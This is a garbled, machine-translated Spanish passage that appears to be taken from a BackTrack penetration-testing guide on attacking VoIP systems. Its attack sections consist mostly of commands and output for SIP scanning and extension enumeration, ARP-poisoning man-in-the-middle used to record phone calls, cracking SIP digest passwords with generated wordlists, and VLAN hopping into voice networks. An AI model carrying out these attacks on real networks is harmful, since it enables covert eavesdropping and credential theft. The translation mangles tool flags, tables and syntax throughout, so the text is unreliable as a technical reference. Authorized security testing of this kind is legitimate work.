# 2: "CUDA-Device # 2 'GeForce GTX 295: 10912.5 PMKs / s (RTT 2.9)
# 3: "CUDA-Device # 3 'GeForce GTX 295: 10632.1 PMKs / s (RTT 3,0)
# 4: "CUDA-Device # 4 'GeForce GTX 295: 11654.7 PMKs / s (RTT 2.9)
# 5: "CUDA-Device # 5" GeForce GTX 295: 10868.9 PMKs / s (RTT 2.9)
# 6: "CUDA-Device # 6 'GeForce GTX 295: 10322.8 PMKs / s (RTT 3,0)
xito! Ahora podemos utilizar las herramientas CUDA BackTrack impulsados desde dentro.
JTR grupo
Despus de instalar la versin MPI de John the Ripper configuramos nuestro archivo / etc / hosts.
root @ bt: ~ # nano / etc / hosts
127.0.0.1 localhost
192.168.1.69 servidor
192.168.1.70 nodo1
# Las siguientes lneas son recomendables en equipos que pueden IPv6
:: 1 localhost ip6-localhost loopback ip6fe00 :: 0 ip6-localnet
ff00 :: 0 ip6-mcastprefix
ff02 :: 1 ip6-allnodes
ff02 :: 2 ip6-allrouters
ff02 :: 3 ip6-allhosts
Pyrit grupo
Ahora, desde que el cliente debe ser capaz de ver ambos ncleos.
NOTA: El comando Pyrit list_cores tiene un error que cuando se utiliza el servidor se bloquee.
Podemos probar nuestro cmulo de nueva construccin con opcin de punto de referencia Pyrit.
root @ bt: ~ # Pyrit punto de referencia
Si cambiar al servidor mientras se ejecuta el punto de referencia, se puede ver que en la actualidad
uno cliente est conectado.
Voz sobre IP
Pentesting VOIP
Contenido
[hide]
1 Pruebas
de
Penetraci
n con
BackTrack
VOIP
2 Tpico
VoIP
Topologas
2,1
Self
Hos
ted
2,2
Hos
ted
Ser
vic
es
2.3
Ser
vici
o
Onl
ine
SIP
3
Fundament
os SIP
3.1
Las
soli
citu
des
SIP
/
Mt
odo
s
3
3.2
Las
res
Auto Hosted
Una PBX (ie Asterisk) est instalado en el sitio del cliente y conectado a un ISP o proveedor de servicios
de telefona PSTN a travs de una troncal SIP / PRI, el trfico de VoIP fluye a travs de una VLAN
dedicada.
Visio diagrama de Amir Avraham
Servicios de Alojamiento
No hay necesidad de un PBX en el sitio. Slo un switch, un router, telfonos IP y una conexin a la
central a travs de proveedor de servicios de Internet o IP / VPN conexin, cada telfono se configura con
informacin de la cuenta SIP.
SIP Basics
El SIP (Session Initiation Protocol) papel es configurar, cancelar o modificar una voz o una videollamada
concentrndose la voz y / o el trfico de video soportado por un protocolo como RTP (Protocolo de
transporte en tiempo real). SIP es un protocolo de capa de aplicacin que utiliza UDP para el transporte
(TCP y SCTP se puede utilizar tambin).
SIP normalmente utiliza los puertos 5060 TCP o UDP para sealizacin cifrada o 5061
para el transporte cifrado mediante TLS.
SIP es un protocolo basado en ASCII que tiene algunos elementos similares, como en el protocolo HTTP
utilizando una peticin / respuesta modelo. Al igual que una peticin HTTP de un navegador de una
solicitud de cliente SIP se realiza mediante un URI SIP un agente de usuario y un mtodo / solicitud. SIP
utiliza el correo electrnico como formato de direcciones: user / telfono @ dominio / IP es un tpico
URI SIP se ve as:
sip: 205@192.168.1.100, sip: username@pbx.com, sip: 205@192.168.1.100: 5060
De acuerdo con la solicitud presentada por el cliente ser recibido una respuesta con un cdigo de estado
o de error, las tablas siguientes se describen las peticiones y las respuestas disponibles en el protocolo
SIP.
Descripcin
Se utiliza para invitar y dar cuenta de participar en una sesin de llamada.
Acusar recibo de una peticin INVITE.
Cancelar una solicitud pendiente.
Registrar el usuario con un servidor SIP.
Muestra informacin acerca de las capacidades de una persona que llama.
Termina una sesin entre dos usuarios en una llamada.
Indica que el destinatario (identificado por la URI de la solicitud)
CONSULTE
SIP Respuestas
Respuesta
1xx
Descripcin
Respuestas informativos, solicitud recibida y ser
procesada.
Respuestas exitosas La accin fue recibida con xito,
2xx
3xx
4xx
5xx
comprendido y aceptado.
Respuestas de redireccin
Solicitar respuestas fracaso de la peticin es sintcticamente incorrecta o
no se pueden cumplir en el servidor.
Las respuestas del servidor falla, el servidor incumplido una de las
servidor.
De ataque
Antes de empezar con las herramientas que vamos a echar un vistazo a algunos tipos de ataque comunes
VoIP:
Recopilacin de informacin, Huella y recuento.
O simplemente puede navegar a travs del men de KDE para el "Backtrack" "Voz sobre IP" submens:
Recopilacin de informacin
Esta fase es donde nos reunimos informacin acerca de la topologa, servidores y clientes para obtener
informacin tanto como podamos a fin de lanzar un ataque exitoso. Lo que nos interesa es la bsqueda de
hospederos vivos, el tipo y la versin PBX, servidores VoIP / gateways, clientes (hardware y software) los
tipos y versiones, etc ... En vez de enumerar los nombres de usuario "" vamos a enumerar las extensiones
SIP. Echemos un vistazo a algunas de las herramientas disponibles en Backtrack que nos ayuden a
encontrar, identificar y enumerar los dispositivos de VoIP habilitadas.
SMAP
Backtrack incluye una gran herramienta llamada SMAP, que es un escner simple para dispositivos con
capacidad SIP SMAP enva de varias solicitudes SIP en espera de respuestas de SIP habilitado router
DSL, apoderados y agentes de usuario.
Se podra considerar un mash up de NMAP y SIPSAK.
SMAP uso:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP
SMAP 0.6.0 http://www.wormulon.net/
uso: SMAP [Opciones]
-H: esta ayuda
-D: aumentar la depuracin
-O: activar huellas dactilares
Ahora que hemos identificado a los anfitriones con capacidad SIP podemos utilizar SMAP de la huella
digital del tipo cliente / servidor y versin:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-O 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
En el caso de SMAP no poda nuestra huella anfitrin se utiliza el argumento-l para ponerlo en modo de
aprendizaje para proporcionar alguna informacin til:
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-l 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
AVISO: test_accept: "Accept: application / sdp"
AVISO: test_allow: "Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, CONSULTE, suscribir, NOTIFY"
AVISO: test_supported: "Con el apoyo: sustituye"
AVISO: test_via: capitalizacin de transporte: 2
AVISO: test_via: "sucursal; alias; recibido; rport"
AVISO: test_via: Por favor, aadir cmpstr nuevo
AVISO: test_via: capitalizacin de transporte: 2
192.168.1.104: accesible ICMP, SIP habilitado
mejor estimacin (70% seguro) huella digital:
Asterisk PBX SVN-r56579 troncoHUELLA informacin:
newmethod = 501
accept_class = 2
allow_class = 201
supported_class = 8
via_class = 2
hoe_class = ignorar
options = 200
brokenfromto = 404
PRACK = 481
mesa de ping = 501
invitar = 200
User-Agent: Asterisk PBX
1 host escaneado, 1 alcanzable ICMP, 1 con capacidad SIP (100,0%)
Otra caracterstica til de SMAP es el argumento-d, que permite la salida de depuracin para verbosidad
intenta utilizar el o-junto con l a ver el proceso de toma de huellas dactilares en los detalles.
root @ bt :/ pentest / VoIP / SMAP #. / SMAP-d 192.168.1.104
SMAP 0.6.0 http://www.wormulon.net/
DEBUG:
DEBUG:
DEBUG:
DEBUG:
DEBUG:
IP local: 212.235.66.182
IP local: 212.235.66.182
bind () con xito
RAW socket abierto
pasar de 1 a S_START S_PING
SIPSAK
SIPSAK se utiliza para probar las aplicaciones habilitadas SIP y dispositivos que utilizan el mtodo de
solicitud nica opcin. Podemos usarlo para huellas digitales y enumeracin. Usted no encontrar
SIPSAK en el directorio "/ pentest / voip /" directorio, se puede ejecutar desde cualquier lugar
simplemente escribiendo SIPSAK.
root @ bt: ~ # SIPSAK SIPSAK 0.9.6 por Nils Ohlmeier Copyright (C) 2002-2004 FhG Fokus Copyright
(C) 2004-2005 Nils, informe de errores a Ohlmeier nils@sipsak.org rodaje: SIPSAK [-f archivo] [- L]-s
SIPURI rastro: SIPSAK-T-s SIPURI usrloc: SIPSAK-U [-I | M] [-b NMERO] [-e NMERO] [-x NMERO] [-z
NMERO]-s SIPURI usrloc: SIPSAK -I | M [-b NMERO] [-e NMERO]-s SIPURI usrloc: SIPSAK-U [-C
SIPURI] [-x NMERO]-s SIPURI mensaje: SIPSAK-M [B-STRING] [-O CADENA] [-c SIPURI]-s SIPURI
inundacin: SIPSAK-F [-e NMERO]-s SIPURI azar: SIPSAK-R [-t NMERO]-s parmetro SIPURI adicional
en todos los modos: [-a CONTRASEA] [-d] [ -i] [-H HOSTNAME] [-l PUERTO] [-m nmero] [-n] [-N] [-r
puerto] [-v] [-V] [-w]-h muestra este mensaje de ayuda - V imprime cadena de versin slo-f file El
archivo que contiene el mensaje de SIP para enviar uso - por nivel de entrada-L desactivar CR (\ r)
insercin en los archivos-s SIPURI la URI del servidor de destino en forma sip: [usuario @]
nombre_servidor [: puerto]-T activa el modo de traceroute-U se activa el modo usrloc-I simula
algunas llamadas exitosas con s mismo-M enva mensajes a s mismo-C SIPURI utilizar el URI como
contacto en REGISTER-b Nmero del apndice nmero inicial de el nombre de usuario (por defecto:
0)-E Nmero de la numer de finalizacin del apndice del nombre de usuario-o nmero de nmero
de dormir ms antes de enviar el siguiente peticin-x NMERO expira el campo de encabezado valor
(por defecto: 15)-z NMERO activa el azar eliminacin de usuario encuadernaciones-F se activa el
modo de inundacin-R activa los modues aleatorios (peligroso)-t Nmero El nmero mximo de
caracteres destrozado en modo aleatorio (por defecto: duracin peticin)-l PORT del puerto local
para usar (por defecto: ninguno) - r El puerto remoto (por defecto: 5060)-p objetivo peticin
HOSTNAME (proxy saliente)-H HOSTNAME sobrescribe el nombre de host local en todo NMERO
headers-m el valor de la cabecera max-forwards campo-n usar FQDN en lugar de direcciones IP en la
Via-Line-i desactivar la insercin de un Via-Line-una contrasea para la autenticacin de contrasea
(si la contrasea se omite = "")-u nombre de usuario de autenticacin STRING-d-v ignorar
redireccionamientos cada v produce ms verbosidad (mx. 3) -w IP extracto de la advertencia en
respuesta-g cadena de reemplazo para una marca especial en la sustitucin mensaje-G activa de las
variables-N devuelve cdigos de salida compatible con Nagios-q Cadena de bsqueda de una
expresin regular en las respuestas y en caso de fallo de error de retorno-W NMERO volver
advertencia Nagios si retransmisin> nmero B-STRING enviar un mensaje con la cadena como
cuerpo-O CADENA Content-Disposition Nmero NMERO valor-P de los procesos de start-A Nmero
Nmero de ejecuciones de pruebas e imprimir slo tiempos-S utilizan un mismo puerto para la
recepcin de y el envo-c SIPURI utilizar el URI como en De MENSAJE-D multiplicador de tiempo de
espera para INVITAR NMERO transacciones y medios de transporte confiables (por defecto: 64)-E
STRING especificar de transporte a utilizar-j STRING agrega cabeceras adicionales a la solicitud
He aqu un ejemplo de uso de SIPSAK a un dispositivo de huella digital con capacidad SIP Podemos ver
en el resultado de que el dispositivo que consulta es un Audiocodes MP-114 gateway FXS.
root @ bt: ~ # SIPSAK-vs-s sip: 192.168.1.221
mensaje recibido:
SIP/2.0 200 OK
Via: SIP/2.0/UDP 127.0.1.1:51601; sucursal = z9hG4bK.18a1b21f; rport, alias
De: sip: sipsak@127.0.1.1: 51601; tag = 97ac9e5
A: sip: 192.168.1.221; tag = 1c1785761661
Call-ID: 159042021@127.0.1.1
CSeq: 1 OPCIONES
Contacto:
Compatible con: em, 100rel, temporizador, sustituye, camino, recursos prioridad Permitir:
REGISTRO, OPTIONS, INVITE, ACK, CANCEL, BYE, notificar, PRACK, CONSULTE, INFO, SUBSCRIBE,
UPDATE servidor:-Audiocodes-SIP-Gateway-MP 114 FXS/v.5.40A.040.005 X-Recursos: telchs = 4/0;
mediachs = 0/0 Accept: application / sdp, application / simple-mensaje-resumen, el mensaje /
sipfrag Content-Type: application / sdp Content- Longitud: 343 v = 0 o = 1785763980 1785763858
AudiocodesGW EN IP4 192.168.1.221 s = Telfono-Call C = EN IP4 192.168.1.221 t = 0 0 = 6000 m
audio RTP / AVP 18 8 0 127 a = rtpmap: 18 G729 / a = 8000 fmtp: 18 annexb = no a = rtpmap: 8
PCMA/8000 a = rtpmap: 0 PCMU/8000 a = rtpmap: 127 telephone-event/8000 a = fmtp: 127 = 0-15
un ptime: 20 a = sendrecv a = RTCP: 6001 EN IP4 192.168.1.221 ** respuesta recibida despus de
67,923 ms ** SIP/2.0 200 OK final recibida
SIPScan
Sip-Scan es un escner simple para saborear hosts habilitados para que pueda escanear un solo host o una
subred completa.
Sip-scan uso:
root @ bt :/ pentest / voip / sipscan # / sip exploracin--. ayudar
. / Sip-scan versin [unknown] llamado Getopt :: std :: getopts (versin 1,05),
funcionando bajo la versin Perl 5.10.0.
Uso: sip-scan [opciones]
-V Ser detallado.
-I ip | si Interface / IP SIP-headers (por defecto: IP desde ppp0)
-P puerto puerto remoto para escanear. (Por defecto: 5060)
-L puerto local origen de los paquetes. (Por defecto: 5060)
-Dn [p] Espere n ms despus de cada paquete enviado (por defecto: 50ms) o si 'p' es
dado, enve n paquetes por segundo (por defecto: 20)
-Wn Wait n ms para las respuestas restantes (por defecto: 2000 ms)
SVMAP
SVMAP forma parte de un conjunto de herramientas llamado sipvicious y es mi favorito escner de
eleccin Puede ser utilizado para escanear identificar y huella digital de una sola direccin IP o un rango
de direcciones IP. Svmap permite especificar el mtodo de la peticin que est siendo usado para la
digitalizacin, el mtodo predeterminado es OPCIONES, ofrece depuracin y opciones de verbosidad e
incluso permite escanear los registros SRV de SIP en el dominio de destino. Usted puede utilizar el
modificador /. Svmap h-para ver todos los argumentos disponibles
. root @ bt :/ pentest / voip / sipvicious # / svmap.py uso: svmap.py [opciones] host1 host2
hostrange ejemplos: svmap.py 10.0.0.1-10.0.0.255 \> 172.16.131.1 sipvicious.org/22 10,0 ... .1.1/24
\> 1.1.1.1-20 1.1.2-20 * 4.1 * * svmap.py-s session1 - aleatorizar 10.0.0.1 / 8 svmap.py - resume
session1-v svmap.py - p5060-5062-m 10.0.0.3-20 INVITAR
Extensiones Enumeracin
Enumeracin de extensin puede ayudar a un atacante mediante la bsqueda de extensiones vlidas en un
sistema de VoIP que luego puede conducir a un ataque de fuerza bruta sobre las cuentas SIP.
Enumeracin obras de ampliacin por los errores que examinan devueltos por los mtodos solicitudes
SIP REGISTER como, opciones y INVITAR
Svwar
Svwar es tambin una herramienta de la suite sipvicious permite enumerar las extensiones utilizando una
gama de extensiones o utilizar un archivo de diccionario svwar apoya todos los de los tres mtodos de
enumeracin de extensin como se ha mencionado anteriormente, el mtodo por defecto para la
enumeracin es registrarse.
Uso:
Ejemplo:
Svwar ha identificado todas las extensiones que he creado en mi servidor Trixbox. Puede especificar otro
mtodo sorbo utilizando el m-argumento, tambin se puede aadir-v o t-vv para mostrar ms
informacin.
. root @ bt :/ pentest / voip / sipvicious # / svwar.py-e100-400 192.168.1.104 m-INVITE-v INFO:
TakeASip: tratar de obtener ip auto .. puede tardar un rato INFO: root: iniciar el INFO motores:
TakeASip: Ok dispositivo SIP INFO encontrados: TakeASip: extension '200 'existe - requiere
autenticacin INFO: TakeASip: extension '201' existe - requiere autenticacin ----- Edit- --- INFO:
TakeASip: extension '203 'existe - requiere autenticacin INFO: TakeASip: extension '303' existe requiere autenticacin INFO: TakeASip: extension '303 'existe - requiere autenticacin INFO:
TakeASip: extension '305' existe - requiere INFO autenticacin: root: contamos con 6 extensiones |
Extensin | Autenticacin | ------------------------------ | 201 | reqauth | | 200 | reqauth | | 203 | reqauth | |
202 | reqauth | | 303 | reqauth | | 305 | reqauth | INFO: root: Tiempo total: 0:00:21.944731
Enumiax
Enumiax se utiliza para enumerar los nombres de usuario de Asterisk protocolo de Cambio. Permite un
ataque de diccionario o un nombre de usuario secuencial Adivinar
root @ bt :/ pentest / voip / enumiax #. / enumiax
enumIAX 1,0
Dustin D. Trammell
Uso: enumiax [opciones] destino
opciones:
-D Diccionario ataque con expediente
-I Intervalo para auto-save (nmero de operaciones, por defecto 1000)
-M # nombre de usuario mnima (en caracteres)
-M # nombre de usuario mximo (en caracteres)
-R # lmite de velocidad de las llamadas (en microsegundos)
-S Leer el estado de sesin de archivo de estado
-V verbosidad Incremento (repeticin de verbosidad adicional)
-V Imprimir informacin de versin y salir
-H help Imprimir / uso de la informacin y de salida
root @ bt :/ pentest / voip / enumiax #. / enumiax-v-M3-M3 192.168.1.104
enumIAX 1,0
Dustin D. Trammell
Objetivo adquirido: 192.168.1.104
Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ...
Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:04:18
Ahora trabaja en 3 nombres de usuario de caracteres ...
#################
Tratando nombre de usuario: "000"
#################
Tratando nombre de usuario: "001"
#################
Tratando nombre de usuario: "002"
#################
Tratando nombre de usuario: "003"
#################
Tratando nombre de usuario: "004"
#################
Tratando nombre de usuario: "005"
#################
Tratando nombre de usuario: "006"
#################
Tratando nombre de usuario: "007"
#################
Tratando nombre de usuario: "008"
#################
...
################
################
################
################
################
################
################
################
################
################
Dustin D. Trammell
Objetivo adquirido: 192.168.1.104
Conexin a 192.168.1.104 a travs de UDP en el puerto 4569 ...
Iniciar el proceso de enumeracin en: Jue 05 de febrero 2011 13:02:39
#####################
Tratando de usuario: "guest"
#####################
Tratando nombre de usuario: "iaxtel"
#####################
Tratando nombre de usuario: "iaxtel2"
#####################
Tratando de usuario: "100"
#####################
Tratando nombre de usuario: "101"
#####################
Tratando nombre de usuario: "200"
#####################
Tratando nombre de usuario: "201"
#####################
Tratando de usuario: "202"
#####################
Tratando nombre de usuario: "203"
Fin del archivo de diccionario alcanzado, salir.
############
############
############
############
############
############
############
############
############
Para este tipo de ataque que tendr que realizar un hombre en medio del ataque que se requieren los
siguientes pasos:
Arp intoxicacin / spoofing
Oler el trfico
Decodificacin RTP datos a un archivo de audio.
arpspoof" carpeta en Backtrack, de hecho slo puede invocarlo desde cualquier lugar, escribiendo:
arpspoof Antes de poder utilizar arpspoof tendremos que activar el reenvo IP:
root @ bt: ~ # echo 1> / proc/sys/net/ipv4/ip_forward
Dejaremos que nuestro envenenamiento ARP ejecutarse en segundo plano mientras se realiza una captura
con Wireshark.
Ahora vamos a empezar a capturar algo de trfico ... Si bien para olfatear el trfico de usuario "B" ha
puesto en marcha el telfono X-Lite suave en su computadora de escritorio y marc el usuario "A"
extensin 200.
Podemos ver que hemos capturado el trfico SIP, pero para esta seccin estn ms interesados en el
trfico RTP, ya que contiene los datos reales de conversacin.
Wireshark tiene una caracterstica muy bien para decodificar llamadas VoIP capturados los datos en
formato de audio reproducibles Usted puede encontrar esta caracterstica en las estadsticas -> Llamadas
VoIP men.
Voipong
Voipong es una utilidad que detecta todas las llamadas de voz sobre IP en una tubera, y para aquellos que
estn G711 codificado, los vertederos de conversacin real a archivos de onda diferentes. Es compatible
con SIP, H323, protocolo de cliente de Cisco Delgado, RTP y RTCP. Voipong se encuentra en retroceso "/
pentest / voip / voipong" directorio Antes de poder utilizar voipong tendremos que hacer algunos cambios
en el archivo voipong.conf:
root @ bt :/ pentest / voip / voipong # nano / etc voipong.conf
soxpath = / usr / bin / sox
networksfile = / pentest / voip / voipong / etc / voipongnets
outdir = / pentest / voip / voipong / salida /
device = eth0 # su tarjeta de interfaz de red nombre
Una vez voipong detecta una llamada de telfono se iniciar capturarlo una vez que termine de voipong
se detendr el proceso de captura y lo hacen a un fichero wave jugable. Toda la conversacin se guardar
en el directorio "/ pentest / voip / voipong / salida" carpeta
Vomitar
Vomit convierte un telfono Cisco IP RTP conversacin en un archivo de sonido que se puede jugar con
los jugadores sanos normales. Vomit requiere un archivo de salida de tcpdump. Con el fin de obtener
vomitar en marcha tendremos que descargar e instalar WavePlay Consguelo aqu:
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/waveplay-20010924.tar.gz.5731.html
root @ bt: ~ # tar-xzvf WavePlay-20010924.tar.gz
WavePlay-20010924 /
waveplay-20010924/Makefile
waveplay-20010924/waveplay.c
waveplay-20010924/waveplay.ja.1
waveplay-20010924/wavefmt.h
waveplay-20010924/README
waveplay-20010924/waveplay.1
waveplay-20010924/README.jp
root @ bt: ~ # cd WavePlay-20010924
root @ bt: ~ / WavePlay-20010924 # make
cc-c-o waveplay.o waveplay.c
waveplay.o cc-o WavePlay
root @ bt: ~ / WavePlay-20010924 # cp WavePlay / usr / bin /
root @ bt :/ pentest / voip / vmito # / vmitos sip.dump r |. WavePlay-S8000-B16-C1
UCsniff
UCSniff es un video de VoIP e IP Seguridad herramienta de evaluacin que integra el software de cdigo
abierto que existe en varias caractersticas tiles, lo que permite VoIP y Video IP propietarios y
profesionales de seguridad a prueba rpidamente por la amenaza de espionaje no autorizado VoIP y
Video. UCSniff apoya envenenamiento ARP, VLAN Hopping, VLAN descubrimiento a travs de CDP,
tiene una capacidad de rastreadores y ms ... Lo considero como un todo en una herramienta de
espionaje. Echemos un vistazo a algunos ejemplos de uso:
UCSniff puede operar en los modos 2
Modo Monitor - En caso de ser utilizado en un medio compartido donde los telfonos IP
conectados a saber: un HUB, punto de acceso inalmbrico, se puede tambin utilizar en un
entorno conmutado mediante el establecimiento de una sesin SPAN en un switch Cisco.
Hombre en el modo medio - Este modo tiene 2 modos adicionales que son
Modo de aprendizaje
Modo Dirigido
Preparacin UCSniff por lo que puede ejecutar desde cualquier lugar de dar marcha atrs:
root @ bt :/ tmp # cd / pentest / voip / ucsniff /
root @ bt :/ pentest / voip / ucsniff #. / configure
root @ bt :/ pentest / voip / ucsniff # make
root @ bt :/ pentest / voip / ucsniff # make install
Si echamos un vistazo a los archivos de registro UCSniff podemos ver los objetivos descubiertos
utilizados en el ataque.
root @ bt :/ tmp / ucsniff # cat targets.txt
192.168.1.118,201, sip
192.168.1.104,200, sip
Una vez que un archivo vlido targets.txt se encuentra, se le pedir que seleccione un modo de escucha:
root @ bt :/ tmp / ucsniff # ucsniff-i eth0-T
UCSniff 2,1 de partida
Analizados 2 entradas en el archivo Targets, targets.txt
UCSniff ejecuta en modo de destino. Analizada 2 objetivos previamente descubiertos
Por favor, seleccione un modo de espionaje dirigida:
1. Usuario
Descripcin: interceptar todas las llamadas desde o hacia un punto final determinado.
2. Conversacin
Descripcin: espiar a los flujos de conversacin bidireccional entre dos puntos finales seleccionados.
Por favor, seleccione la opcin (1) o (2):
Si selecciona "Usuario" indica a la herramienta para interceptar todo el trfico entre el Blanco, y el resto
de la red.
En "Conversacin", dos puntos finales se seleccionan y la red es ARP envenenada para interceptar slo el
trfico entre los dos usuarios.
UCSniff incluye las herramientas ms tiles y los ataques de los modos como el salto de VLAN (usando
ACE) que se discutirn ms adelante.
Xplico
Aunque Xplico no est en el directorio Backtrack voip herramientas, es una herramienta muy til para
capturar trfico SIP y RTP (entre otros protocolos). Xplico se puede encontrar en el Backtrack -> Digital
Forensics - men Herramientas> Anlisis Forense
En caso de que no est presente en la instalacin Backtrack slo tiene que instalar con el comando
siguiente:
root @ bt: ~ # apt-get install xplico
Xplico se puede utilizar para capturar trfico en tiempo real o importar un archivo PCAP Wireshark
captura. De cualquier manera Xplico decodificar los paquetes capturados y les montamos en el formato
adecuado en nuestro caso ser SIP y RTP. Despus de ejecutar Xplico le pedir que inicie sesin, el
nombre de usuario y contrasea por defecto son: xplico
Una vez que haya iniciado sesin para Xplico tendremos que crear un caso
Tendremos que elegir entre una captura vivo o importar un archivo PCAP En este ejemplo vamos a
utilizar Xplico para realizar una captura en vivo (vamos a Arp envenenar nuestros objetivos en segundo
plano usando arpspoof). Ahora tendremos que elegir nuestro caso y crear una nueva sesin
Al elegir nuestra sesin recin creada veremos nuestra pgina de estadsticas principal con la opcin de
elegir nuestro adaptador de red e iniciar / detener el proceso de captura.
Atacar autenticacin
SIP puede ser susceptible a dos tipos de ataques de autenticacin, antes de echar un vistazo a estos
ataques tipo vamos a entender cmo es un registro SIP y el proceso de autenticacin se lleva a cabo. SIP
utiliza una autenticacin implcita que es un mecanismo que utiliza el protocolo HTTP y conocido como
HTTP digest. Debido a que SIP es un protocolo basado en ASCII los detalles de autenticacin son
ordenadas con el fin de evitar el transporte en texto claro. Cuando un cliente SIP (User Agent) quiere
autenticar con un servidor SIP, el servidor genera y enva un desafo digest al cliente, que contiene los
siguientes parmetros:
Realm - se usa para identificar las credenciales dentro como mensaje SIP, por lo general es el dominio
SIP Nonce -. Esto es una cadena md5 nico que es generado por el servidor para cada solicitud de
registro que est hecho de un sello de tiempo y una frase secreta para asegurar tiene una vida til limitada
y no se poda ser utilizado de nuevo. Una vez que el cliente recibe el desafo digest y el usuario introduce
sus credenciales el cliente utiliza el nonce para generar una respuesta digest y lo enva de vuelta al
servidor.
Dicho esto, vamos a tratar de descifrar la respuesta digest con el fin de obtener una contrasea vlida de
SIP cuenta.
SIPCrack uso:
root @ bt :/ pentest / voip / sipcrack #. / sipcrack
SIPcrack 0,3 (MaJoMu | www.codito.de)
---------------------------------------Uso: sipcrack [opciones] [-s |-w ]
Logins = Archivo que contiene olfate por Opciones SIPdump:-s = stdin uso de contraseas
lista de palabras-w = archivo que contiene todas las contraseas a probar-p num = proceso de
impresin de craqueo contraseas cada n (-w) (ATENCIN: se ralentiza en gran medida) * O -w o-s
tiene que ser dada
Ataque de diccionario
Backtrack ofrece algunos diccionarios bsicos que se encuentran en:
root @ bt :/ pentest / passwords / listas de palabras
Sin embargo, para el propsito de este artculo voy a utilizar otra herramienta en la parrilla Crunch
retroceder llamada que se utiliza para crear diccionarios personalizados. Vamos a utilizar para crear un
crujido crujido seis caracteres numricos diccionario se encuentra en:
Crunch de uso:
uso: crunch [-F / ruta / a / charset.lst charset-name] [-o wordlist.txt] [-t [FIXED] @ @ @ @] [-s
Startblock] [-c nmero]
root @ bt :/ pentest / passwords / crunch #. / crunch 6 6-f charset.lst numrico-o / pentest / voip /
sipcrack / sipass.txt Crunch generar ahora 7000000 bytes de datos Crunch ahora generar 6 MB de
datos Crunch ahora genera 0 GB de datos 100%
Vamos a utilizar un credenciales previamente capturados por SIPDump sip almacenados en el archivo
auth.txt ans sipass.txt como diccionario (que hemos creado utilizando crunch)
Descifrando la respuesta Digest:
Generando contraseas usando john y redirigir la salida a nuestro fichero FIFO, para este ejemplo vamos
a generar hasta 6 dgitos solamente.
root @ bt: ~ # john
[*] Este script le llevar a / pentest / passwords / jtr /
[*] A partir de ah, ejecute. / John
root @ bt :/ pentest / passwords / JTR # / john -. incremental = dgitos-stdout = 6> / tmp / sipcrack
VLAN Hopping
Por lo general, el trfico de VoIP se conecta a una VLAN dedicada (Virtual LAN), como vimos en la
seccin topologas. Esto significa que no se puede interceptar el trfico de VoIP por inhalacin e
intoxicacin Arp. La razn de ello es que una VLAN es como una red independiente, tiene su propio
dominio de broadcast y rango de IP diferente a la red de datos. VLAN salto es una forma de "saltar" a
otra VLAN, por suerte para nosotros Backtrack incluye las herramientas necesarias para llevar a cabo
este ataque. Una topologa comn es cuando el telfono IP tiene un built-in "Switch interno", por lo
general el PC est conectado a la toma PC y el telfono mvil se conecta desde su lan / sw socket con el
conmutador de red de la siguiente manera:
Un conmutador CISCO tpica configuracin de puertos para VoIP se ver algo como:
Switch # conf t
Introduzca los comandos de configuracin, uno por lnea. Terminar con CTRL / Z.
Switch (config) # interface FastEthernet 0/1
Switch (config-if) # switchport modo de acceso
Switch (config-if) # switchport access vlan 10
Switch (config-if) # switchport voz vlan 20
VoIP Hopper
VoIP tolva se utiliza para saltar a la VLAN de voz por comportarse como un telfono IP, soporta
conmutadores especficos y es compatible con algunos modelos de telfonos IP. Actualmente soporta las
marcas como: Cisco, Avaya y Nortel. VoIP tolva fue diseado para ejecutarse en Backtrack Linux y
actualmente cuenta con las siguientes caractersticas: DHCP Client, generador de CDP, la suplantacin de
direcciones MAC y VLAN salto. Voiphopper uso:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper
voiphopper-i <interface>-c {0 | 1 | 2}-a-n-v <VLANID>
Por favor, especifique una opcin de modo de base:
CDP Sniff Mode (-c 0)
Ejemplo: voiphopper-i eth0-c 0
CDP Spoof modo de paquete personalizado (-c 1):
-D (ID de dispositivo)
-P (Port ID)
-C (Capacidades)
-L (Plataforma)
-S (Software)
-U (Duplex)
Ejemplo: voiphopper-i eth0-c 1-E 'SIP00070EEA5086'-P 'Port 1' Host-C-L 'Cisco IP Phone 7940'-S
'P003-08-8-00-1-U
CDP Spoof modo de pre-hechos paquetes (-c 2)
Ejemplo: voiphopper-i eth0-c 2
Avaya modo DHCP Opcin (-a):
VoIP Hopper ofrece muchos modos de ataque por favor utiliza el h-para obtener informacin
detallada.
Echemos un vistazo a un ejemplo de la inhalacin de CDP y ejecutar un salto de VLAN en la VLAN de
voz en un entorno de Cisco. Ejecutar VoIP Hopper en la interfaz de Ethernet, de la siguiente manera:
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-c 0
VoIP Hopper tambin le permite a uno Hop VLAN a VLAN arbitraria, sin oler a CDP. Si usted ya conoce
la voz VLAN ID o le gustara Hop VLAN a otra VLAN slo tiene que especificar el ID de VLAN.
root @ bt :/ pentest / voip / voiphopper #. / voiphopper-i eth0-v 20
VoIP Hopper 1,00 Ejecucin en modo VLAN Hop ~ Tratar de saltar a la VLAN 2
Aadido VLAN 20 a la interfaz eth0
Intentando dhcp solicitud de nueva interfaz eth0.20
eth0.20 Enlace encap: Ethernet HWaddr 00:0 c: 29:84:98: b2
inet6 addr: fe80 :: 20c: 29ff: FE84: 98b2/64 Alcance: Enlace
UP NOTRAILERS BROADCAST RUNNING MULTICAST MTU: 1500 Mtrica: 1
RX packets: 0 errores: 0 cado: 0 sobrecostos: 0 frame: 0
TX paquetes: 9 errores: 0 cado: 0 sobrecostos: 0 carrier: 0
colisiones: 0 txqueuelen: 0
RX bytes: 0 (0.0 B) TX bytes: 2274 (2.2 KB)
ACE
ACE es una herramienta ms para VLAN salto muy similar a Voiphopper en el uso e incluyen una opcin
para descubrir tambin los servidores de TFTP (servidores de configuracin). ACE uso:
root @ bt :/ pentest / voip / as #. / as
ACE v1.0: Automated corporativa (Datos) Enumerator
Uso: as [-i interface] [-m mac address] [-t servidor tftp direccin ip |-c modo cdp |-v voz vlan id |-r
interfaz vlan |-d modo verbose]
